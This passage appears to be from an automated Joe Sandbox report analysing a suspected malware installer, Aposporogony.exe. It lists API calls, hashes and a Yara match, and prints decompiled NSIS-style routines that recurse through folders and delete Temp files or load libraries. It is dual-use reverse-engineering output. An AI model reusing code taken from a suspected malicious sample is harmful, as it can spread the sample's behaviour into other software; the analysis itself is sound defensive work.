                                                                                                                                                                                      0x73d21e80
                                                                                                                                                                                      0x73d21e52
                                                                                                                                                                                      0x73d21e52
                                                                                                                                                                                      0x73d21e53
                                                                                                                                                                                      0x73d21e61
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d21e61
                                                                                                                                                                                      0x73d21e56
                                                                                                                                                                                      0x73d21e57
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d21e5d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d21e5d
                                                                                                                                                                                      0x73d21d5e
                                                                                                                                                                                      0x73d21e49
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d21e49
                                                                                                                                                                                      0x73d21d64
                                                                                                                                                                                      0x73d21d64
                                                                                                                                                                                      0x73d21d67
                                                                                                                                                                                      0x73d21d90
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d21d90
                                                                                                                                                                                      0x73d21d69
                                                                                                                                                                                      0x73d21d69
                                                                                                                                                                                      0x73d21d6c
                                                                                                                                                                                      0x73d21d86
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d21d86
                                                                                                                                                                                      0x73d21d6e
                                                                                                                                                                                      0x73d21d6e
                                                                                                                                                                                      0x73d21d71
                                                                                                                                                                                      0x73d21d80
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d21d80
                                                                                                                                                                                      0x73d21d74
                                                                                                                                                                                      0x73d21d75
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d21d77
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d21d77
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d21c28
                                                                                                                                                                                      0x73d21bca
                                                                                                                                                                                      0x73d21bcd
                                                                                                                                                                                      0x73d21bfc
                                                                                                                                                                                      0x73d21c00
                                                                                                                                                                                      0x73d21c07
                                                                                                                                                                                      0x73d21c0e
                                                                                                                                                                                      0x73d21c11
                                                                                                                                                                                      0x73d21c14
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d21c14
                                                                                                                                                                                      0x73d21bcf
                                                                                                                                                                                      0x73d21bd0
                                                                                                                                                                                      0x73d21beb
                                                                                                                                                                                      0x73d21bf2
                                                                                                                                                                                      0x73d21bf5
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d21bf5
                                                                                                                                                                                      0x73d21bd5
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d21bdb
                                                                                                                                                                                      0x73d21bdb
                                                                                                                                                                                      0x73d21be2
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d21be2
                                                                                                                                                                                      0x73d21bd5
                                                                                                                                                                                      0x73d21db6
                                                                                                                                                                                      0x73d21dbb
                                                                                                                                                                                      0x73d21dc0
                                                                                                                                                                                      0x73d21dc4
                                                                                                                                                                                      0x73d2226d
                                                                                                                                                                                      0x73d22273
                                                                                                                                                                                      0x73d21dd6
                                                                                                                                                                                      0x73d21dd8
                                                                                                                                                                                      0x73d21dd9
                                                                                                                                                                                      0x73d22196
                                                                                                                                                                                      0x73d22196
                                                                                                                                                                                      0x73d22199
                                                                                                                                                                                      0x73d2219c
                                                                                                                                                                                      0x73d221b9
                                                                                                                                                                                      0x73d221bf
                                                                                                                                                                                      0x73d221c1
                                                                                                                                                                                      0x73d221c7
                                                                                                                                                                                      0x73d221de
                                                                                                                                                                                      0x73d221de
                                                                                                                                                                                      0x73d221de
                                                                                                                                                                                      0x73d221eb
                                                                                                                                                                                      0x73d221f1
                                                                                                                                                                                      0x73d221f4
                                                                                                                                                                                      0x73d221fa
                                                                                                                                                                                      0x73d221fc
                                                                                                                                                                                      0x73d22200
                                                                                                                                                                                      0x73d22202
                                                                                                                                                                                      0x73d22209
                                                                                                                                                                                      0x73d2220e
                                                                                                                                                                                      0x73d22211
                                                                                                                                                                                      0x73d22213
                                                                                                                                                                                      0x73d22218
                                                                                                                                                                                      0x73d2222a
                                                                                                                                                                                      0x73d2222a
                                                                                                                                                                                      0x73d22218
                                                                                                                                                                                      0x73d22211
                                                                                                                                                                                      0x73d22200
                                                                                                                                                                                      0x73d22230
                                                                                                                                                                                      0x73d22233
                                                                                                                                                                                      0x73d2223d
                                                                                                                                                                                      0x73d22245
                                                                                                                                                                                      0x73d22252
                                                                                                                                                                                      0x73d22258
                                                                                                                                                                                      0x73d2225b
                                                                                                                                                                                      0x73d2218b
                                                                                                                                                                                      0x73d2218b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d2218b
                                                                                                                                                                                      0x73d22261
                                                                                                                                                                                      0x73d22267
                                                                                                                                                                                      0x73d22267
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d22269
                                                                                                                                                                                      0x73d22269
                                                                                                                                                                                      0x73d22269
                                                                                                                                                                                      0x73d22269
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d22235
                                                                                                                                                                                      0x73d22235
                                                                                                                                                                                      0x73d2223b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d2223b
                                                                                                                                                                                      0x73d22233
                                                                                                                                                                                      0x73d221ca
                                                                                                                                                                                      0x73d221d0
                                                                                                                                                                                      0x73d221d2
                                                                                                                                                                                      0x73d221d8
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d221d8
                                                                                                                                                                                      0x73d2219e
                                                                                                                                                                                      0x73d221a5
                                                                                                                                                                                      0x73d221ab
                                                                                                                                                                                      0x73d221b1
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d221b1
                                                                                                                                                                                      0x73d21ddf
                                                                                                                                                                                      0x73d21de0
                                                                                                                                                                                      0x73d22175
                                                                                                                                                                                      0x73d22175
                                                                                                                                                                                      0x73d2217b
                                                                                                                                                                                      0x73d2217e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d22185
                                                                                                                                                                                      0x73d2218a
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d2218a
                                                                                                                                                                                      0x73d21de7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d21ded
                                                                                                                                                                                      0x73d21ded
                                                                                                                                                                                      0x73d21df6
                                                                                                                                                                                      0x73d21dfb
                                                                                                                                                                                      0x73d21e01
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d21e07
                                                                                                                                                                                      0x73d21e14
                                                                                                                                                                                      0x73d21e1a
                                                                                                                                                                                      0x73d21e24
                                                                                                                                                                                      0x73d21e2a
                                                                                                                                                                                      0x73d21e32
                                                                                                                                                                                      0x73d21e42
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d21e42

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 73D2121B: GlobalAlloc.KERNEL32(00000040,?,73D2123B,?,73D212DF,00000019,73D211BE,-000000A0), ref: 73D21225
                                                                                                                                                                                      • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 73D21C6F
                                                                                                                                                                                      • lstrcpyW.KERNEL32(00000008,?), ref: 73D21CB7
                                                                                                                                                                                      • lstrcpyW.KERNEL32(00000808,?), ref: 73D21CC1
                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 73D21CD4
                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 73D21DB6
                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 73D21DBB
                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 73D21DC0
                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 73D21FAA
                                                                                                                                                                                      • lstrcpyW.KERNEL32(?,?), ref: 73D22144
                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000008), ref: 73D221B9
                                                                                                                                                                                      • LoadLibraryW.KERNEL32(00000008), ref: 73D221CA
                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,?), ref: 73D22224
                                                                                                                                                                                      • lstrlenW.KERNEL32(00000808), ref: 73D2223E
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2059161849.0000000073D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 73D20000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2059082131.0000000073D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2059250947.0000000073D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2059333077.0000000073D25000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_73d20000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 245916457-0
                                                                                                                                                                                      • Opcode ID: 802ee37f321f8dcad5691579308b6326e0d554eca88dfc7d85da4d445461b7ed
                                                                                                                                                                                      • Instruction ID: fe343f4543a5c19e168c799f280a6f1e51bd4152f764d5bae6875bd65cdeb53e
                                                                                                                                                                                      • Opcode Fuzzy Hash: 802ee37f321f8dcad5691579308b6326e0d554eca88dfc7d85da4d445461b7ed
                                                                                                                                                                                      • Instruction Fuzzy Hash: 61228B72D04249DBDB128FA4CD807AEBFB5FF0472AF54852AE1A6F3180E77496858B50
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 716 405afa-405b20 call 405dc5 719 405b22-405b34 DeleteFileW 716->719 720 405b39-405b40 716->720 721 405cb6-405cba 719->721 722 405b42-405b44 720->722 723 405b53-405b63 call 4063e8 720->723 724 405c64-405c69 722->724 725 405b4a-405b4d 722->725 729 405b72-405b73 call 405d09 723->729 730 405b65-405b70 lstrcatW 723->730 724->721 727 405c6b-405c6e 724->727 725->723 725->724 731 405c70-405c76 727->731 732 405c78-405c80 call 40672b 727->732 733 405b78-405b7c 729->733 730->733 731->721 732->721 740 405c82-405c96 call 405cbd call 405ab2 732->740 736 405b88-405b8e lstrcatW 733->736 737 405b7e-405b86 733->737 739 405b93-405baf lstrlenW FindFirstFileW 736->739 737->736 737->739 741 405bb5-405bbd 739->741 742 405c59-405c5d 739->742 756 405c98-405c9b 740->756 757 405cae-405cb1 call 405450 740->757 745 405bdd-405bf1 call 4063e8 741->745 746 405bbf-405bc7 741->746 742->724 744 405c5f 742->744 744->724 758 405bf3-405bfb 745->758 759 405c08-405c13 call 405ab2 745->759 748 405bc9-405bd1 746->748 749 405c3c-405c4c FindNextFileW 746->749 748->745 752 405bd3-405bdb 748->752 749->741 755 405c52-405c53 FindClose 749->755 752->745 752->749 755->742 756->731 762 405c9d-405cac call 405450 call 4061ae 756->762 757->721 758->749 763 405bfd-405c06 call 405afa 758->763 769 405c34-405c37 call 405450 759->769 770 405c15-405c18 759->770 762->721 763->749 769->749 772 405c1a-405c2a call 405450 call 4061ae 770->772 773 405c2c-405c32 770->773 772->749 773->749
                                                                                                                                                                                      C-Code - Quality: 98%
                                                                                                                                                                                      			E00405AFA(void* __eflags, signed int _a4, signed int _a8) {
                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                      				short _v556;
                                                                                                                                                                                      				short _v558;
                                                                                                                                                                                      				struct _WIN32_FIND_DATAW _v604;
                                                                                                                                                                                      				signed int _t38;
                                                                                                                                                                                      				signed int _t52;
                                                                                                                                                                                      				signed int _t55;
                                                                                                                                                                                      				signed int _t62;
                                                                                                                                                                                      				void* _t64;
                                                                                                                                                                                      				signed char _t65;
                                                                                                                                                                                      				WCHAR* _t66;
                                                                                                                                                                                      				void* _t67;
                                                                                                                                                                                      				WCHAR* _t68;
                                                                                                                                                                                      				void* _t70;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t65 = _a8;
                                                                                                                                                                                      				_t68 = _a4;
                                                                                                                                                                                      				_v8 = _t65 & 0x00000004;
                                                                                                                                                                                      				_t38 = E00405DC5(__eflags, _t68);
                                                                                                                                                                                      				_v12 = _t38;
                                                                                                                                                                                      				if((_t65 & 0x00000008) != 0) {
                                                                                                                                                                                      					_t62 = DeleteFileW(_t68); // executed
                                                                                                                                                                                      					asm("sbb eax, eax");
                                                                                                                                                                                      					_t64 =  ~_t62 + 1;
                                                                                                                                                                                      					 *0x42a2e8 =  *0x42a2e8 + _t64;
                                                                                                                                                                                      					return _t64;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				_a4 = _t65;
                                                                                                                                                                                      				_t8 =  &_a4;
                                                                                                                                                                                      				 *_t8 = _a4 & 0x00000001;
                                                                                                                                                                                      				__eflags =  *_t8;
                                                                                                                                                                                      				if( *_t8 == 0) {
                                                                                                                                                                                      					L5:
                                                                                                                                                                                      					E004063E8(0x425730, _t68);
                                                                                                                                                                                      					__eflags = _a4;
                                                                                                                                                                                      					if(_a4 == 0) {
                                                                                                                                                                                      						E00405D09(_t68);
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						lstrcatW(0x425730, L"\\*.*");
                                                                                                                                                                                      					}
                                                                                                                                                                                      					__eflags =  *_t68;
                                                                                                                                                                                      					if( *_t68 != 0) {
                                                                                                                                                                                      						L10:
                                                                                                                                                                                      						lstrcatW(_t68, 0x40a014);
                                                                                                                                                                                      						L11:
                                                                                                                                                                                      						_t66 =  &(_t68[lstrlenW(_t68)]);
                                                                                                                                                                                      						_t38 = FindFirstFileW(0x425730,  &_v604);
                                                                                                                                                                                      						_t70 = _t38;
                                                                                                                                                                                      						__eflags = _t70 - 0xffffffff;
                                                                                                                                                                                      						if(_t70 == 0xffffffff) {
                                                                                                                                                                                      							L26:
                                                                                                                                                                                      							__eflags = _a4;
                                                                                                                                                                                      							if(_a4 != 0) {
                                                                                                                                                                                      								_t30 = _t66 - 2;
                                                                                                                                                                                      								 *_t30 =  *(_t66 - 2) & 0x00000000;
                                                                                                                                                                                      								__eflags =  *_t30;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							goto L28;
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							goto L12;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						do {
                                                                                                                                                                                      							L12:
                                                                                                                                                                                      							__eflags = _v604.cFileName - 0x2e;
                                                                                                                                                                                      							if(_v604.cFileName != 0x2e) {
                                                                                                                                                                                      								L16:
                                                                                                                                                                                      								E004063E8(_t66,  &(_v604.cFileName));
                                                                                                                                                                                      								__eflags = _v604.dwFileAttributes & 0x00000010;
                                                                                                                                                                                      								if(__eflags == 0) {
                                                                                                                                                                                      									_t52 = E00405AB2(__eflags, _t68, _v8);
                                                                                                                                                                                      									__eflags = _t52;
                                                                                                                                                                                      									if(_t52 != 0) {
                                                                                                                                                                                      										E00405450(0xfffffff2, _t68);
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										__eflags = _v8 - _t52;
                                                                                                                                                                                      										if(_v8 == _t52) {
                                                                                                                                                                                      											 *0x42a2e8 =  *0x42a2e8 + 1;
                                                                                                                                                                                      										} else {
                                                                                                                                                                                      											E00405450(0xfffffff1, _t68);
                                                                                                                                                                                      											E004061AE(_t67, _t68, 0);
                                                                                                                                                                                      										}
                                                                                                                                                                                      									}
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									__eflags = (_a8 & 0x00000003) - 3;
                                                                                                                                                                                      									if(__eflags == 0) {
                                                                                                                                                                                      										E00405AFA(__eflags, _t68, _a8);
                                                                                                                                                                                      									}
                                                                                                                                                                                      								}
                                                                                                                                                                                      								goto L24;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags = _v558;
                                                                                                                                                                                      							if(_v558 == 0) {
                                                                                                                                                                                      								goto L24;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags = _v558 - 0x2e;
                                                                                                                                                                                      							if(_v558 != 0x2e) {
                                                                                                                                                                                      								goto L16;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags = _v556;
                                                                                                                                                                                      							if(_v556 == 0) {
                                                                                                                                                                                      								goto L24;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							goto L16;
                                                                                                                                                                                      							L24:
                                                                                                                                                                                      							_t55 = FindNextFileW(_t70,  &_v604);
                                                                                                                                                                                      							__eflags = _t55;
                                                                                                                                                                                      						} while (_t55 != 0);
                                                                                                                                                                                      						_t38 = FindClose(_t70);
                                                                                                                                                                                      						goto L26;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					__eflags =  *0x425730 - 0x5c;
                                                                                                                                                                                      					if( *0x425730 != 0x5c) {
                                                                                                                                                                                      						goto L11;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					goto L10;
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					__eflags = _t38;
                                                                                                                                                                                      					if(_t38 == 0) {
                                                                                                                                                                                      						L28:
                                                                                                                                                                                      						__eflags = _a4;
                                                                                                                                                                                      						if(_a4 == 0) {
                                                                                                                                                                                      							L36:
                                                                                                                                                                                      							return _t38;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						__eflags = _v12;
                                                                                                                                                                                      						if(_v12 != 0) {
                                                                                                                                                                                      							_t38 = E0040672B(_t68);
                                                                                                                                                                                      							__eflags = _t38;
                                                                                                                                                                                      							if(_t38 == 0) {
                                                                                                                                                                                      								goto L36;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							E00405CBD(_t68);
                                                                                                                                                                                      							_t38 = E00405AB2(__eflags, _t68, _v8 | 0x00000001);
                                                                                                                                                                                      							__eflags = _t38;
                                                                                                                                                                                      							if(_t38 != 0) {
                                                                                                                                                                                      								return E00405450(0xffffffe5, _t68);
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags = _v8;
                                                                                                                                                                                      							if(_v8 == 0) {
                                                                                                                                                                                      								goto L30;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							E00405450(0xfffffff1, _t68);
                                                                                                                                                                                      							return E004061AE(_t67, _t68, 0);
                                                                                                                                                                                      						}
                                                                                                                                                                                      						L30:
                                                                                                                                                                                      						 *0x42a2e8 =  *0x42a2e8 + 1;
                                                                                                                                                                                      						return _t38;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					__eflags = _t65 & 0x00000002;
                                                                                                                                                                                      					if((_t65 & 0x00000002) == 0) {
                                                                                                                                                                                      						goto L28;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					goto L5;
                                                                                                                                                                                      				}
                                                                                                                                                                                      			}


















                                                                                                                                                                                      0x00405b04
                                                                                                                                                                                      0x00405b09
                                                                                                                                                                                      0x00405b12
                                                                                                                                                                                      0x00405b15
                                                                                                                                                                                      0x00405b1d
                                                                                                                                                                                      0x00405b20
                                                                                                                                                                                      0x00405b23
                                                                                                                                                                                      0x00405b2b
                                                                                                                                                                                      0x00405b2d
                                                                                                                                                                                      0x00405b2e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00405b2e
                                                                                                                                                                                      0x00405b39
                                                                                                                                                                                      0x00405b3c
                                                                                                                                                                                      0x00405b3c
                                                                                                                                                                                      0x00405b3c
                                                                                                                                                                                      0x00405b40
                                                                                                                                                                                      0x00405b53
                                                                                                                                                                                      0x00405b5a
                                                                                                                                                                                      0x00405b5f
                                                                                                                                                                                      0x00405b63
                                                                                                                                                                                      0x00405b73
                                                                                                                                                                                      0x00405b65
                                                                                                                                                                                      0x00405b6b
                                                                                                                                                                                      0x00405b6b
                                                                                                                                                                                      0x00405b78
                                                                                                                                                                                      0x00405b7c
                                                                                                                                                                                      0x00405b88
                                                                                                                                                                                      0x00405b8e
                                                                                                                                                                                      0x00405b93
                                                                                                                                                                                      0x00405b99
                                                                                                                                                                                      0x00405ba4
                                                                                                                                                                                      0x00405baa
                                                                                                                                                                                      0x00405bac
                                                                                                                                                                                      0x00405baf
                                                                                                                                                                                      0x00405c59
                                                                                                                                                                                      0x00405c59
                                                                                                                                                                                      0x00405c5d
                                                                                                                                                                                      0x00405c5f
                                                                                                                                                                                      0x00405c5f
                                                                                                                                                                                      0x00405c5f
                                                                                                                                                                                      0x00405c5f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00405bb5
                                                                                                                                                                                      0x00405bb5
                                                                                                                                                                                      0x00405bb5
                                                                                                                                                                                      0x00405bbd
                                                                                                                                                                                      0x00405bdd
                                                                                                                                                                                      0x00405be5
                                                                                                                                                                                      0x00405bea
                                                                                                                                                                                      0x00405bf1
                                                                                                                                                                                      0x00405c0c
                                                                                                                                                                                      0x00405c11
                                                                                                                                                                                      0x00405c13
                                                                                                                                                                                      0x00405c37
                                                                                                                                                                                      0x00405c15
                                                                                                                                                                                      0x00405c15
                                                                                                                                                                                      0x00405c18
                                                                                                                                                                                      0x00405c2c
                                                                                                                                                                                      0x00405c1a
                                                                                                                                                                                      0x00405c1d
                                                                                                                                                                                      0x00405c25
                                                                                                                                                                                      0x00405c25
                                                                                                                                                                                      0x00405c18
                                                                                                                                                                                      0x00405bf3
                                                                                                                                                                                      0x00405bf9
                                                                                                                                                                                      0x00405bfb
                                                                                                                                                                                      0x00405c01
                                                                                                                                                                                      0x00405c01
                                                                                                                                                                                      0x00405bfb
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00405bf1
                                                                                                                                                                                      0x00405bbf
                                                                                                                                                                                      0x00405bc7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00405bc9
                                                                                                                                                                                      0x00405bd1
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00405bd3
                                                                                                                                                                                      0x00405bdb
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00405c3c
                                                                                                                                                                                      0x00405c44
                                                                                                                                                                                      0x00405c4a
                                                                                                                                                                                      0x00405c4a
                                                                                                                                                                                      0x00405c53
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00405c53
                                                                                                                                                                                      0x00405b7e
                                                                                                                                                                                      0x00405b86
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00405b42
                                                                                                                                                                                      0x00405b42
                                                                                                                                                                                      0x00405b44
                                                                                                                                                                                      0x00405c64
                                                                                                                                                                                      0x00405c66
                                                                                                                                                                                      0x00405c69
                                                                                                                                                                                      0x00405cba
                                                                                                                                                                                      0x00405cba
                                                                                                                                                                                      0x00405cba
                                                                                                                                                                                      0x00405c6b
                                                                                                                                                                                      0x00405c6e
                                                                                                                                                                                      0x00405c79
                                                                                                                                                                                      0x00405c7e
                                                                                                                                                                                      0x00405c80
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00405c83
                                                                                                                                                                                      0x00405c8f
                                                                                                                                                                                      0x00405c94
                                                                                                                                                                                      0x00405c96
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00405cb1
                                                                                                                                                                                      0x00405c98
                                                                                                                                                                                      0x00405c9b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00405ca0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00405ca7
                                                                                                                                                                                      0x00405c70
                                                                                                                                                                                      0x00405c70
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00405c70
                                                                                                                                                                                      0x00405b4a
                                                                                                                                                                                      0x00405b4d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00405b4d

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,77272EE0,00000000), ref: 00405B23
                                                                                                                                                                                      • lstrcatW.KERNEL32(00425730,\*.*), ref: 00405B6B
                                                                                                                                                                                      • lstrcatW.KERNEL32(?,0040A014), ref: 00405B8E
                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,77272EE0,00000000), ref: 00405B94
                                                                                                                                                                                      • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,77272EE0,00000000), ref: 00405BA4
                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00405C53
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                      • String ID: "C:\Users\user\Desktop\Aposporogony.exe"$0WB$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                                                                      • API String ID: 2035342205-3075973015
                                                                                                                                                                                      • Opcode ID: d20069049a1222afe0acff19cbecb1b5739181a5e4278bd99c6c17cc719bed24
                                                                                                                                                                                      • Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
                                                                                                                                                                                      • Opcode Fuzzy Hash: d20069049a1222afe0acff19cbecb1b5739181a5e4278bd99c6c17cc719bed24
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2043095128.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3480000_Aposporogony.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: +$+}=h$Q$d$hdt^
                                                                                                                                                                                      • API String ID: 0-910024566
                                                                                                                                                                                      • Opcode ID: a1e14402592a966518c39c11de68254a04da97fee74b0b1c661453e3876f4f6f
                                                                                                                                                                                      • Instruction ID: c728bcebb904545ce87aa94ce39e4a8a18ac4ffddf73992fff88dccb6e92b325
                                                                                                                                                                                      • Opcode Fuzzy Hash: a1e14402592a966518c39c11de68254a04da97fee74b0b1c661453e3876f4f6f
                                                                                                                                                                                      • Instruction Fuzzy Hash: D3F179756047059FDF34DE288DA53EB37A39FA1790FA9452EDCCA9B245D3308982CB06
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
